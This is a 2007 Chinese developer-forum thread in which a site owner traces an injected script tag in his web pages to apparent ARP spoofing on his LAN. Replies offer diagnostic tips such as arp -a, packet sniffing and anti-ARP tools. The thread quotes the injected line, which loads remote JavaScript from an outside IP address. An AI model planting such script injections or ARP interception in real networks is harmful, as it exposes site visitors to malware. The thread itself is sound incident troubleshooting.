假设是服务器被ARP攻击，在服务器上看到的网关的MAC地址是不正确的。但我没法知道正确的网关的地址啊。 <- 中国开发网

CNDEV.ORG

当前在线

论坛

CBD
- 程序员情感CBD
- 程序员见面交流会
CBD开发区
- Java/J2ME
- .NET/C#
- 数据库
- Delphi/BCB
- Visual C
其它
情感
游戏
- CNDEV-CS/WOW
- 浩宇长空
生活
论坛系统

中国开发网: 论坛: 程序员情感CBD: 贴子 555129

pcplayer：

假设是服务器被ARP攻击，在服务器上看到的网关的MAC地址是不正确的。但我没法知道正确的网关的地址啊。

[阅读: 704] 2007-08-21 06:56:33

<空>

相关信息:

靠，有个网站的网页被人挂了条病毒？里面第一句是：<script src=http://66.186.33.44/n.js></script> (空) (pcplayer [705] 2007-08-21 10:06)
- 我检查页面的 ASP 源码，里面没有这一行。那么，这一行是怎么被加上去到访问者的浏览器页面里的？ (空) (pcplayer [529] 2007-08-21 10:23)
  - 就是在你编辑网站源码的时候正在运行的病毒加进去的 (42字) (Apache [487] 2007-08-21 10:28)
    - 我是用记事本打开asp的source来看，没有看到上述那一行。但访问的时候就有。所以奇怪它怎么加上去的。 (空) (pcplayer [510] 2007-08-21 10:30)
      - 估计是拦截了窗口关闭的消息吧。 (空) (Apache [587] 2007-08-21 10:31)
      - 如果是偶的话，就拦截FTP的通讯消息， (51字) (Apache [557] 2007-08-21 10:36)
        和FTP没关系。我直接在服务器上看的 (空) (pcplayer [439] 2007-08-21 10:37)
  - 有可能机房有机器劫持了web流量,然后在里面加入的 (空) (lukejee [602] 2007-08-21 10:30)
    - 像没脾气上次说的那个有机器中毒了，所有访问 CNDEV 的都经过它中转了一把？ (空) (pcplayer [470] 2007-08-21 10:38)
      - 有可能的,ARP + XXX么 (空) (lukejee [514] 2007-08-21 10:38)
      - 内网同网段的机器中毒了，劫持IP。。。。。。。 (9字) (haitao [694] 2007-08-21 10:39)
        应该不是劫持IP吧？如果是劫持IP，它除了中转所有HTTP访问，还得中转其它访问。否则其它访问不正常了。但现在其它访问是正常的。 (空) (pcplayer [595] 2007-08-21 10:44)
        你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [438] 2007-08-21 12:21)
  - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [451] 2007-08-21 12:21)
- 这是那段 n.js 里面的代码，我自己写了个 http 去把它抓下来的，但我看不懂它要干什么： (3922字) (pcplayer [910] 2007-08-21 10:41)
  - 还要写一个函数把它还原出来啊 (空) (haitao [496] 2007-08-21 10:52)
- 那台服务器实际上是在一个动态IP解析的内网，前面就一个硬件的IP共享路由器，内部没有其它WEB服务器。 (136字) (pcplayer [720] 2007-08-21 10:47)
  - 中毒的机器不一定就必须是web server。。。。。。。 (空) (haitao [440] 2007-08-21 11:18)
    - 但中毒的机器必须中转所有其它端口的IP访问。因为我现在可以从外面访问服务器的3389。 (空) (pcplayer [611] 2007-08-21 11:23)
      - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [406] 2007-08-21 12:23)
  - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [506] 2007-08-21 12:20)
- 呼唤机器人！！！！！ (空) (pcplayer [436] 2007-08-21 10:49)
- 日！我写了个文本文件，内容：this is a test，改名为 test.html，然后从外面去访问，居然返回的页面还是被挂上那条 JS (空) (pcplayer [490] 2007-08-21 11:15)
  - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [413] 2007-08-21 12:21)
- 想不到这可能是什么原因导致的了。1. 服务器输出页面的时候应该没有带上那一行 JS；2. 和服务器同在一个内网的其它机器应该没有劫持它的IP，因为我现在可以远程访问到服务器的338…… (空) (pcplayer [521] 2007-08-21 11:19)
  - 那个东西就是个病毒，就在你改源代码的那台机器 (11字) (Apache [479] 2007-08-21 11:21)
    - 不是服务器里的。服务器输出的页面是没问题的。从和服务器同一个内网的机器访问服务器获得的页面是正常的。 (38字) (pcplayer [484] 2007-08-21 11:24)
      - 找電信的網管問一下就知道啊. (空) (leeming [509] 2007-08-21 11:51)
        他們有時是想用來監測一些什麼的似的...所以中國的網民是常被強奸的 (空) (leeming [446] 2007-08-21 11:52)
      - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [453] 2007-08-21 12:20)
  - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [378] 2007-08-21 12:20)
- ARP欺骗攻击+其它病毒 (空) (没脾气2x [486] 2007-08-21 12:04)
  - 不象ARP欺骗。从外面访问那台服务器的 3389 也没问题。除非 ARP 欺骗的中转站同时也中转 3389 (空) (pcplayer [477] 2007-08-21 14:14)
    - 同时转别的端口很难吗？ (空) (没脾气2x [461] 2007-08-21 14:19)
    - 靠,发动arp攻击的机器实际上现在已经是类似于NAT的工作状态了,只是它选择在转发的HTTP包里面掺东西,其它原封不动转发,3389当然正好好用了 (空) (lukejee [631] 2007-08-21 14:21)
- 你托管的机器被同一网段内的另一台服务器玩了ARP欺骗，找网管 (空) (李战 [515] 2007-08-21 13:28)
  - 或者装个arp防火墙如 antiarp (空) (没脾气2x [522] 2007-08-21 13:34)
  - 看贴不仔细。不时托管的。就是在一个ADSL网关后的局域网里的一台机器。网关里其它机器都是普通工作电脑。 (空) (pcplayer [492] 2007-08-21 14:13)
    - 你的现像就是arp欺骗攻击。 (空) (没脾气2x [0] 今天 12:20 ) (空) (没脾气2x [1] 今天 12:20 ) (空) (没脾气2x [435] 2007-08-21 14:18)
    - 就是和你ADSL外网IP同网段的机器搞ARP欺骗，ARP欺骗通通都中转，只是把http的加入点东西再中转。 (空) (李战 [573] 2007-08-21 14:20)
      - 外网同网段？这个不可能了。外网是 ADSL，直接去电信了。所以我才怀疑电信在搞鬼。如果是内网的某台机器ARP欺骗，那么内网的机器访问那台服务器也同样该出问题的，但没有问题。 (25字) (pcplayer [659] 2007-08-21 14:42)
        电信也有可能,这叫流氓硬件,原来有人拉我做的 (空) (lukejee [402] 2007-08-21 14:45)
    - 你的局域网里有人中了病毒，这个病毒在arp欺骗你的这台服务器。装个antiarp试试看有没有arp攻击再说吧。 (空) (没脾气2x [557] 2007-08-21 14:21)
      - 如果是局域网内的ARP欺骗，局域网内的其它人访问服务器也该出问题。但现在局域网内的人访问服务器没问题。 (空) (pcplayer [529] 2007-08-21 14:45)
        ARP欺骗一般只欺骗网关 (空) (UnKnow365 [513] 2007-08-21 14:47)
    - 运行一下 arp -a 看看IP与MAC的对应关系就知道了 (空) (李战 [607] 2007-08-21 14:24)
      - 如果欺骗了，也看不出来啊。只看到对应关系，没法知道那个对应正确不正确啊。 (空) (pcplayer [429] 2007-08-21 14:39)
        在服务器上查网卡MAC地址 (空) (UnKnow365 [699] 2007-08-21 14:48)
        去IP所属的真正机器查MAC，就知道是否对应正确，特别是网关的MAC (空) (李战 [697] 2007-08-21 14:49)
        假设是 ARP，则网关认为服务器的 MAC 是 XYZ，但网关本身是个硬件，看不到它里面的状态。没有什么终端可以让你输入 ARP 命令。 (22字) (pcplayer [600] 2007-08-21 14:54)
        一般用浏览器打开网关IP，即可进入ADSL管理页面，里面可以查到ADSL自己的MAC。如果那台ARP攻击机把网关管理屏蔽了，你可以直接连ADSL来查。 (空) (李战 [1104] 2007-08-21 14:59)
        假设是服务器被ARP攻击，在服务器上看到的网关的MAC地址是不正确的。但我没法知道正确的网关的地址啊。 (空) (pcplayer [703] 2007-08-21 14:56)
        开个抓包器,看看有没有那个孙子老发arp包告诉别人别人的ip和自己的mac就知道了 (空) (lukejee [702] 2007-08-21 14:59)
        antiarpsniffer试试可找出真正MAC (空) (UnKnow365 [724] 2007-08-21 15:02)
        我考，这个 ARP 也太巧了？网关的 MAC 最后一位是 26，服务器上对应网关的 MAC 前面都相同，最后一位是 25。刚好有台电脑的网卡的 MAC 和网关只差这么一个数？ (60字) (pcplayer [724] 2007-08-21 15:13)
        网关的：出厂值: 00-40-16-09-00-26 ；服务器上 ARP 到的：00-40-16-09-00-25 (空) (pcplayer [583] 2007-08-21 15:15)
        MAC是可以伪造的，它就伪造得很象，欺骗你的眼睛啊，知道你还戴眼镜，哈哈 (空) (李战 [566] 2007-08-21 15:17)
        但它伪造的 MAC 并不是它自己的 MAC，那么，它必须是工作在网卡混杂模式下，是一个 sniffer 才行了。 (空) (pcplayer [524] 2007-08-21 15:20)

欢迎光临本社区，您还没有登录，不能发贴子。请在这里登录

页面内容处理时间: 0.011 - 546680